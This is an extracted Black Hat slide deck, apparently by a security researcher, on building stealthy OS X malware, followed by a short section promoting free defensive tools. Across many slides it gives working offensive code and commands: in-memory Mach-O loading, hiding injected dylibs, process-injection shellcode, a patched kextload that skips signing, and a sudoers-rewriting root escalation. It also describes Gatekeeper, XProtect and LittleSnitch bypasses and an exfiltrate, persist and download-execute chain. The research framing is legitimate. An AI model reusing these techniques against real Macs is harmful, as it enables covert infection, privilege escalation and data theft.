 } ourhardworkbythesewordsguar dedpleasedontsteal(c)AppleC algo: Blowfish (pre 10.6, AES) $  strings  -­‐a  myMalware     applicationDidFinishLaunching:   @"NSString"16@0:8   I  <3  BLACKHAT!   $  ./protect  myMalware    encrypting  'myMalware'   type:  CPU_TYPE_X86_64    encryption  complete   $  strings  -­‐a  myMalware  
 n^jd[P5{Q   r_`EYFaJq07 known malware: ~50% detection drop
  • 24. tie to a specific target STRONGLY ENCRYPT YOUR MALWARE "environmental key generation towards clueless agents" "[the malware] tied the infection to the specific machine, and meant the payload couldn't be decrypted without knowing the NTFS object ID" 'equation group malware' N: environmental observation
 H: a one way (hash) function M: hash(es) H of observation N, needed for activation, carried by agent
 K: a key //at runtime if H(H(N)) = M then let K := H(N) } intended target any other
  • 25. IN-MEMORY DECRYPTION & LOADING C&C server } custom in-memory loader? map image load dependencies link OS X supports in-memory loading! local file-system memory custom crypto, requires custom loader
  • 26. dyld supports in-memory loading/linking IN-MEMORY MACH-O LOADING //vars   NSObjectFileImage  fileImage  =  NULL;   NSModule  module                          =  NULL;   NSSymbol  symbol                          =  NULL;   void  (*function)(const  char  *message);     //have  an  in-­‐memory  (file)  image  of  a  mach-­‐O  file  to  load/link   //  -­‐>note:  memory  must  be  page-­‐aligned  and  alloc'd  via  vm_alloc!
 //create  object  file  image
 NSCreateObjectFileImageFromMemory(codeAddr,  codeSize,  &fileImage);
 //link  module  
 module  =  NSLinkModule(fileImage,  "<anything>",  NSLINKMODULE_OPTION_PRIVATE);   //lookup  exported  symbol  (function)   symbol  =  NSLookupSymbolInModule(module,  "_"  "HelloBlackHat");
 //get  exported  function's  address
 function  =  NSAddressOfSymbol(symbol);
 //invoke  exported  function
 function("thanks  for  being  so  offensive  ;)"); loading a mach-O file from memory sample code released by apple (2005) 'MemoryBasedBundle' stealth++ no longer hosted
  • 27. unlink dylibs to complicated detection 'HIDING' LOADED LIBRARIES struct  task_dyld_info  {     mach_vm_address_t   all_image_info_addr;       mach_vm_size_t        all_image_info_size;       integer_t                all_image_info_format;         };   struct  dyld_all_image_infos  {     uint32_t             version;         uint32_t             infoArrayCount;       const  struct  dyld_image_info*  infoArray;      ... remove from infoArray decrement infoArrayCount $  unlinkDylib   [+]  injected  into  1337,  unlinked  dylib:  /Users/patrick/hideMe.dylib     
 #  lldb  -­‐p  1337   (lldb)  image  list  |  hideMe.dylib   error:  the  target  has  no  matching  modules loaded dylib data structures to unlink unlinked dylib; hidden from lldb et. al. stealth++
  • 28. other random ideas SELF DEFENSE prevent deletion? 'complicating' deletion #  chflags  schg  malware.dylib
 #  rm  malware.dylib   rm:  malware.dylib:  Operation  not  permitted "The schg flag can only be unset in single-user mode" self-monitoring? detect local access (dtrace) #  /usr/bin/opensnoop   0    90189  AVSCANNER      malware.dylib virusTotal 0 10 20 30 40 jan feb mar apr may detect detections google adwords? }
  • 29. getting code into remote processes RUN-TIME PROCESS INJECTION newosxbook.com }mac hacker's handbook run-time injection mach_inject (PPC & i386) x86_64 no x86_64 :( buggy/broken :( (intentionally) at run-time, inject arbitrary dynamic libraries (dylibs) into arbitrary process the goal
  • 30. determining target process' architecture RUN-TIME PROCESS INJECTION //check  if  remote  process  is  x86_64   BOOL  Is64Bit(pid_t  targetPID)   {          //info  struct          struct  proc_bsdshortinfo  procInfo;                    //get  proc  info          //  -­‐>assumes  valid  pid,  etc          proc_pidinfo(targetPID,  PROC_PIDT_SHORTBSDINFO,                                    0,  &procInfo,  PROC_PIDT_SHORTBSDINFO_SIZE);                    //'pbsi_flags'  has  a  64-­‐bit  mask          return  procInfo.pbsi_flags  &  PROC_FLAG_LP64;   } external process, architecture detection all 64-bit 32 3rd-party 32-bit google drive dropbox vpn apps 64 } }
  • 31. //remote  library  loading  shellcode  (x86_64)     char  shellCode[]  =    "x90"                                                                                //  nop..    "x55"                                                                                //  pushq    %rbp    "x48x89xe5"                                                                //  movq      %rsp,  %rbp    "x48x83xecx20"                                                        //  subq      $32,  %rsp    "x89x7dxfc"                                                                //  movl      %edi,  -­‐4(%rbp)    "x48x89x75xf0"                                                        //  movq      %rsi,  -­‐16(%rbp)    "xb0x00"                                                                        //  movb      $0,  %al    
  //  call  pthread_set_self      "x48xbfx00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rdi    "x48xb8"  "_PTHRDSS"                                                  //  movabsq  $140735540045793,  %rax    "xffxd0"                                                                        //  callq    *%rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "x48x8dx3dx2cx00x00x00"                                //  leaq      44(%rip),  %rdi    
  //  dlopen    "x48xb8"  "DLOPEN__"                                                  //  movabsq  $140735516395848,  %rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "xffxd0"                                                                        //  callq    *%rax        //  sleep(1000000)...    "x48xbfx00xe4x0bx54x02x00x00x00"        //  movabsq  $10000000000,  %rdi    "x48xb8"  "SLEEP___"                                                  //  movabsq  $140735516630165,  %rax    "xffxd0"                                                                        //  callq    *%rax    //  plenty  of  space  for  a  full  path  name  here    "LIBLIBLIBLIB"  "x00x00x00x00x00x00...."; target's process architecture RUN-TIME PROCESS INJECTION www.newosxbook.com 64 }addrs patched in at runtime
  • 32. getting code into remote processes RUN-TIME PROCESS INJECTION task_for_pid() mach_vm_allocate() thread_create_running()mach_vm_write() vm_protect() task_for_pid() requires r00t
  • 33. dylib injection (again) ftw! LOAD-TIME PROCESS INJECTION gain automatic & persistent code execution within a process only via a dynamic library hijack }no binary / OS file modifications no process monitoring no complex runtime injection no detection of injection <010>
  • 34. into Apple's Xcode LOAD-TIME PROCESS INJECTION $  python  dylibHijackScanner.py     
 Xcode  is  vulnerable  (multiple  rpaths)   'binary':                '/Applications/Xcode.app/Contents/MacOS/Xcode'   'importedDylib':  '/DVTFoundation.framework/Versions/A/DVTFoundation'     'LC_RPATH':            '/Applications/Xcode.app/Contents/Frameworks' configure hijacker against DVTFoundation (dylib) copy to /Applications/Xcode.app/Contents/ Frameworks/DVTFoundation.framework/Versions/A/ do you trust your compiler now!? 
 (k thompson) Xcode
  • 35. ...starting with Apple's BYPASSING SECURITY PRODUCTS/TECHNOLOGIES xprotectgatekeeper os x sandbox code-signing ‘wins’ < so we’re all safe now, right?!? nope! }
  • 36. allowing unsigned code to execute BYPASSING GATEKEEPER circumvent gatekeeper's draconic blockage via a dynamic library hijack the goal bypass this? gatekeeper in action
  • 37. all files with quarantine attribute are checked HOW GATEKEEPER WORKS quarantine attributes //attributes   $  xattr  -­‐l  ~/Downloads/malware.dmg        com.apple.quarantine:0001;534e3038;      Safari;  B8E3DA59-­‐32F6-­‐4580-­‐8AB3...   safari, etc. tags downloaded content "Gatekeeper is an anti-malware feature of the OS X operating system. It allows users to restrict which sources they can install applications from, in order to reduce the likelihood of executing a Trojan horse" -apple.com
  • 38. go home gatekeeper, you are drunk! GATEKEEPER BYPASS find an -signed or 'mac app store' app that contains an external relative reference to a hijackable dylib create a .dmg with the necessary folder structure to contain the malicious dylib in the externally referenced location #winning verified, so can't modify .dmg/.zip layout (signed) application <external>.dylib gatekeeper only verifies the app bundle!! not verified!
  • 39. #winning GATEKEEPER BYPASS gatekeeper setting's (maximum) gatekeeper bypass :) unsigned (non-Mac App Store) code execution!! CVE 2015-3715 patched in OS X 10.10.4 standard alert still can bypass ;)
  • 40. avoiding detection BYPASSING XPROTECT circumvent XProtect's malware detection so that malware can run in an uninhibited manner the goal bypass this? XProtect in action (flagging iWorm)
  • 41. apple's built-in AV product is weak sauce BYPASSING XPROTECT XProtect signature file (iWorm) name hash file name } bypasses recompile write new ...or just rename!
  • 42. decently secure, but lots of OS X bugs! ESCAPING THE OS X SANDBOX escape from the OS X sandbox to so that our malicious code can perform malicious actions. the goal user data system resources app sandboxed app 20+ bugs that could bypass the sandbox (‘project zero’) "Unauthorized Cross-App Resource Access on Mac OS X & iOS" [ bypasses ]
  • 43. allowing unsigned kext to load BYPASSING KERNEL-MODE CODE SIGNING load malicious unsigned kexts into the kernel the goal bypass this? OS X kernel-mode signing checks
  • 44. directly interface with the kernel BYPASSING KERNEL-MODE CODE SIGNING //unload  kext  daemon   #  launchctl  unload  /System/Library/LaunchDaemons/com.apple.kextd.plist   //load  (unsigned)  driver  with  custom  kext_load   #  ./patchedKextload  -­‐v  unsigned.kext
    Can't  contact  kextd;  attempting  to  load  directly  into  kernel   //profit  :)   #  kextstat  |  grep  -­‐i  unsigned      138        0  0xffffff7f82eeb000    com.synack.unsigned unsigned kext loading download kext_tools patch & recompile kextload loadKextsIntoKernel(KextloadArgs  *  toolArgs)
 {
    //sigResult  =  checkKextSignature(theKext,  0x1,  earlyBoot);      //always  OK!      sigResult  =  0;   } patched kextload
  • 45. rootpipe reborn & more! NEED ROOT? copy Directory Utility to /tmp to get write permissions copy plugin (.daplugin) into Directory Utility's internal plugin directory execute Directory Utility evil plugin payload WriteConfig XPC service Dir. Utility $  ls  -­‐lart  /private/tmp   drwxr-­‐xr-­‐x    patrick    wheel      Directory  Utility.app "Stick That In Your (root)Pipe & Smoke It" 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s or, another bug (Stefan Esser) unpatched!
  • 46. ...and the rest (equally lame) BYPASSING SECURITY PRODUCTS LittleSnitch Sophos ClamXav } bypasses recompile write new behavioral based (firewall)
  • 47. abusing trust to access the network BYPASSING LITTLESNITCH generically bypass LittleSnitch to allow malicious code to access the network in an uninhibited manner? the goal bypass this? LittleSnitch in action
  • 48. load-time 'injection' into a trusted process LITTLE SNITCH BYPASS 0X1 $  python  dylibHijackScanner.py     
 GPG  Keychain  is  vulnerable  (weak/rpath'd  dylib)   'binary':                '/Applications/GPG  Keychain.app/Contents/MacOS/GPG  Keychain'   'weak  dylib':        '/Libmacgpg.framework/Versions/B/Libmacgpg'     'LC_RPATH':            '/Applications/GPG  Keychain.app/Contents/Frameworks' GPG Keychain LittleSnitch rule for GPG Keychain got 99 problems but LittleSnitch ain't one ;)
  • 49. more generically, via iCloud LITTLE SNITCH BYPASS 0X2 iCloud un-deletable system rule: "anybody can talk to iCloud" LittleSnitch's iCloud rule o rly!?...yes!
  • 50. putting some pieces all together SIMPLE END-TO-END ATTACK persist exfil file download & execute cmd persistently install a malicious dylib as a hijacker upload a file ('topSecret') to a remote iCloud account download and run a command ('Calculator.app') doesn't require r00t!
  • 51. ClamXav LittleSnitch Sophos the AV industry vs me ;) PSP TESTING are these blocked? persist exfil file download & execute cmd OS X 'security' products
  • 52. DEFENSE free os x security tools
  • 53. MY CONUNDRUM …I love my mac, but it's so easy to hack "No one is going to provide you a quality service for nothing. If you’re not paying, you’re the product." -unnamed AV company ha, BULLSHIT! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
  • 54. free OS X tools & malware samples OBJECTIVE-SEE malware samples :) KnockKnock BlockBlock TaskExplorer
  • 55. KNOCKKNOCK UI detecting persistence: now an app for that! KnockKnock (UI)
  • 56. KNOCKKNOCK UI VirusTotal integration detect submit rescan results VirusTotal integrations
  • 57. BLOCKBLOCK a 'firewall' for persistence locations status bar BlockBlock, block blocking :) HackingTeam's OS X implant "0-day bug hijacks Macs" (payload)
  • 58. TASKEXPLORER explore all running tasks (processes) '#' filters signing virus total dylibs files network
  • 59. EL CAPITAN (OS X 10.11) next version of OS X to keep us all safe? System  Integrity  Protection
 "A  new  security  policy  that  applies  to  every  running  process,  including   privileged  code  and  code  that  runs  out  of  the  sandbox.  The  policy  extends   additional  protections  to  components  on  disk  and  at  run-­‐time,  only   allowing  system  binaries  to  be  modified  by  the  system  installer  and   software  updates.  Code  injection  and  runtime  attachments  to  system   binaries  are  no  longer  permitted."  -­‐apple.com "rootless" iWorm vs. OS X 10.11 (beta 5)"wut!?" the test:
  • 60.
  • 61. CONCLUSIONS some key takeaways... bypassing pspspersistenceinfection self-defense features improve the malwarez current OS X malware is lame; leading to complacent security products! think differently
  • 62. QUESTIONS & ANSWERS patrick@synack.com @patrickwardle feel free to contact me any time! "What if every country has ninjas, but we only know about the Japanese ones because they’re rubbish?" -DJ-2000, reddit.com final thought ;) "Objective-See's OS X Security Tools" Blackhat Arsenal (tomorrow, 15:30 - 18:00) syn.ac/BlackhatMalware
  • 63. credits - thezooom.com - deviantart.net - iconmonstr.com - flaticon.com images - @osxreverser - http://reverse.put.as/Hitcon_2012_Presentation.pdf - https://www.syscan.org/index.php/download/get/9ee8ed70ddcb2d53169b2420f2fa286e/ SyScan15%20Pedro%20Vilaca%20-%20BadXNU%20a%20rotten%20apple - https://reverse.put.as/2013/11/23/breaking-os-x-signed-kernel-extensions-with-a-nop/
 - www.newosxbook.com - mac hacker's handbook talks/books